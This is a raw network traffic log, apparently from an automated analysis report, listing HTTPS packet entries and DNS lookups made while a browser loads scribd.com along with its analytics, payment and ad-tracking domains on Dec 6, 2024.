                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.826915979 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.826948881 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.827004910 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.827013969 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.827060938 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.841964960 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.841993093 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.846889019 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.846905947 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.846992970 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.847002029 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.847045898 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.862601042 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.862617970 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.862725973 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.862734079 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.862777948 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.868937016 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.869030952 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.869060040 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.872912884 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.872993946 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.873018026 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.875289917 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.875308990 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.875423908 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.875432968 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.875483036 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.880016088 CET49765443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.880059958 CET44349765151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.880142927 CET49765443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.880338907 CET49765443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.880354881 CET44349765151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.883641958 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.883719921 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.883745909 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.887164116 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.887182951 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.887265921 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.887290955 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.887331009 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.891685009 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.891772032 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.891797066 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.899327993 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.899405956 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.899430990 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.900886059 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.900904894 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.901010990 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.901036024 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.901082993 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.914943933 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915019989 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915050030 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915081978 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.915220976 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.916243076 CET49766443192.168.2.1644.221.168.224
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.916275978 CET4434976644.221.168.224192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.916357994 CET49766443192.168.2.1644.221.168.224
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.916574001 CET49766443192.168.2.1644.221.168.224
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.916591883 CET4434976644.221.168.224192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.922768116 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.931081057 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.931147099 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.931174040 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.931202888 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.931340933 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.937553883 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944375038 CET4434974852.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944744110 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944804907 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944814920 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944864035 CET49748443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944910049 CET4434974852.222.144.7192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.944971085 CET49748443192.168.2.1652.222.144.7
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.951850891 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.951917887 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.951929092 CET44349749151.101.194.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.972714901 CET4434975089.35.237.170192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.975898981 CET4434975089.35.237.170192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.975982904 CET49750443192.168.2.1689.35.237.170
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.976672888 CET49750443192.168.2.1689.35.237.170
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.976691961 CET4434975089.35.237.170192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.000968933 CET49749443192.168.2.16151.101.194.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.003652096 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.003679991 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.003767967 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.003784895 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.003824949 CET49745443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.014413118 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.014444113 CET44349745151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.442075968 CET192.168.2.161.1.1.10x224fStandard query (0)www.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.442270041 CET192.168.2.161.1.1.10xe2fbStandard query (0)www.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.714848995 CET192.168.2.161.1.1.10xcf1aStandard query (0)cmp.osano.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.715138912 CET192.168.2.161.1.1.10x4d98Standard query (0)cmp.osano.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.716639996 CET192.168.2.161.1.1.10xeed7Standard query (0)s-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.716777086 CET192.168.2.161.1.1.10x1728Standard query (0)s-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.717643023 CET192.168.2.161.1.1.10xea7Standard query (0)html.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.717778921 CET192.168.2.161.1.1.10x9ac8Standard query (0)html.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.135231018 CET192.168.2.161.1.1.10x445eStandard query (0)www.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.135422945 CET192.168.2.161.1.1.10x6ee6Standard query (0)www.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:16.391738892 CET192.168.2.161.1.1.10xea6fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:16.392151117 CET192.168.2.161.1.1.10xc79eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.105901957 CET192.168.2.161.1.1.10x4099Standard query (0)js.stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.106127977 CET192.168.2.161.1.1.10x2b52Standard query (0)js.stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.991369009 CET192.168.2.161.1.1.10xe493Standard query (0)html.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:17.991607904 CET192.168.2.161.1.1.10x6ab2Standard query (0)html.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.645081997 CET192.168.2.161.1.1.10x85d8Standard query (0)cmp.osano.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.645210981 CET192.168.2.161.1.1.10xd0dbStandard query (0)cmp.osano.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.752944946 CET192.168.2.161.1.1.10xa9beStandard query (0)cmp.osano.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:18.753130913 CET192.168.2.161.1.1.10x6503Standard query (0)cmp.osano.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.940145016 CET192.168.2.161.1.1.10x8b01Standard query (0)s-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.940299988 CET192.168.2.161.1.1.10x6b24Standard query (0)s-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491138935 CET192.168.2.161.1.1.10x3a86Standard query (0)consent.api.osano.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.491393089 CET192.168.2.161.1.1.10x508cStandard query (0)consent.api.osano.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.557893991 CET192.168.2.161.1.1.10xa2adStandard query (0)js.stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:21.558063030 CET192.168.2.161.1.1.10xe663Standard query (0)js.stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:22.874927998 CET192.168.2.161.1.1.10xe29eStandard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:22.875245094 CET192.168.2.161.1.1.10x5723Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:22.927165031 CET192.168.2.161.1.1.10x5043Standard query (0)b-code.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:22.927335024 CET192.168.2.161.1.1.10x51c8Standard query (0)b-code.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.216413975 CET192.168.2.161.1.1.10x4f3Standard query (0)survey.survicate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.216648102 CET192.168.2.161.1.1.10x3e1bStandard query (0)survey.survicate.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.620850086 CET192.168.2.161.1.1.10xadd5Standard query (0)wa.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:24.621014118 CET192.168.2.161.1.1.10xe323Standard query (0)wa.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.808954000 CET192.168.2.161.1.1.10xd0b5Standard query (0)s.yimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:25.809104919 CET192.168.2.161.1.1.10xcab3Standard query (0)s.yimg.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.144315958 CET192.168.2.161.1.1.10x7276Standard query (0)b-code.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.144474030 CET192.168.2.161.1.1.10x6459Standard query (0)b-code.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.417572021 CET192.168.2.161.1.1.10x2ba8Standard query (0)i.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.417840958 CET192.168.2.161.1.1.10xf754Standard query (0)i.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.544559956 CET192.168.2.161.1.1.10x746cStandard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.544733047 CET192.168.2.161.1.1.10x7dadStandard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.741787910 CET192.168.2.161.1.1.10xe8d0Standard query (0)wa.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.741960049 CET192.168.2.161.1.1.10x101cStandard query (0)wa.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.998388052 CET192.168.2.161.1.1.10x6d05Standard query (0)survey.survicate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:26.998555899 CET192.168.2.161.1.1.10xf127Standard query (0)survey.survicate.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.989368916 CET192.168.2.161.1.1.10xea6dStandard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.989527941 CET192.168.2.161.1.1.10x7a14Standard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.990032911 CET192.168.2.161.1.1.10x87fcStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:27.990159988 CET192.168.2.161.1.1.10xfd30Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.032557011 CET192.168.2.161.1.1.10x159cStandard query (0)analytics.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.032743931 CET192.168.2.161.1.1.10xa7afStandard query (0)analytics.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.178078890 CET192.168.2.161.1.1.10x11dfStandard query (0)td.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.180207014 CET192.168.2.161.1.1.10xcf9Standard query (0)td.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.912324905 CET192.168.2.161.1.1.10xedaStandard query (0)live.rezync.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.912481070 CET192.168.2.161.1.1.10x2a1Standard query (0)live.rezync.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.913687944 CET192.168.2.161.1.1.10x5600Standard query (0)match.adsrvr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.913826942 CET192.168.2.161.1.1.10x2f20Standard query (0)match.adsrvr.org65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.936624050 CET192.168.2.161.1.1.10x3d62Standard query (0)d.turn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.936770916 CET192.168.2.161.1.1.10x3f5dStandard query (0)d.turn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.937386990 CET192.168.2.161.1.1.10x430aStandard query (0)dis.criteo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.937522888 CET192.168.2.161.1.1.10x7d67Standard query (0)dis.criteo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.937752008 CET192.168.2.161.1.1.10xd647Standard query (0)b1sync.zemanta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.937859058 CET192.168.2.161.1.1.10x7a3aStandard query (0)b1sync.zemanta.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.938194036 CET192.168.2.161.1.1.10x62d2Standard query (0)mid.rkdms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.938426971 CET192.168.2.161.1.1.10x6d95Standard query (0)mid.rkdms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.938921928 CET192.168.2.161.1.1.10xb026Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:28.939059973 CET192.168.2.161.1.1.10xfc1dStandard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.642605066 CET192.168.2.161.1.1.10xf305Standard query (0)imgv2-1-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:29.642733097 CET192.168.2.161.1.1.10xfa68Standard query (0)imgv2-1-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.807125092 CET192.168.2.161.1.1.10xde07Standard query (0)static.ads-twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.807213068 CET192.168.2.161.1.1.10x5a5eStandard query (0)static.ads-twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.889085054 CET192.168.2.161.1.1.10xb23Standard query (0)rp.liadm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:30.889205933 CET192.168.2.161.1.1.10xcde6Standard query (0)rp.liadm.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.002170086 CET192.168.2.161.1.1.10x5cceStandard query (0)imgv2-2-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.002639055 CET192.168.2.161.1.1.10xd095Standard query (0)imgv2-2-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.037105083 CET192.168.2.161.1.1.10x9d92Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.037300110 CET192.168.2.161.1.1.10x992cStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.610615969 CET192.168.2.161.1.1.10xa671Standard query (0)js.stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.610821009 CET192.168.2.161.1.1.10x16ffStandard query (0)js.stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.639975071 CET192.168.2.161.1.1.10x76e8Standard query (0)imgv2-1-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:31.640250921 CET192.168.2.161.1.1.10xc36dStandard query (0)imgv2-1-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.607506037 CET192.168.2.161.1.1.10xd70eStandard query (0)cdn.pdst.fmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.607810020 CET192.168.2.161.1.1.10x25e1Standard query (0)cdn.pdst.fm65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.608402014 CET192.168.2.161.1.1.10xc229Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.608539104 CET192.168.2.161.1.1.10x7055Standard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.671227932 CET192.168.2.161.1.1.10xa5cfStandard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.671386957 CET192.168.2.161.1.1.10x341Standard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.672153950 CET192.168.2.161.1.1.10xd53eStandard query (0)utt.impactcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:32.672339916 CET192.168.2.161.1.1.10x3aStandard query (0)utt.impactcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.051579952 CET192.168.2.161.1.1.10x966Standard query (0)browser.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.051870108 CET192.168.2.161.1.1.10xd4d8Standard query (0)browser.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.052223921 CET192.168.2.161.1.1.10x79f7Standard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.052370071 CET192.168.2.161.1.1.10xb0a8Standard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.053257942 CET192.168.2.161.1.1.10xd16dStandard query (0)imgv2-2-f.scribdassets.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:33.053430080 CET192.168.2.161.1.1.10x31c0Standard query (0)imgv2-2-f.scribdassets.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.555140018 CET192.168.2.161.1.1.10xf185Standard query (0)www.redditstatic.comA (IP address)IN (0x0001)false
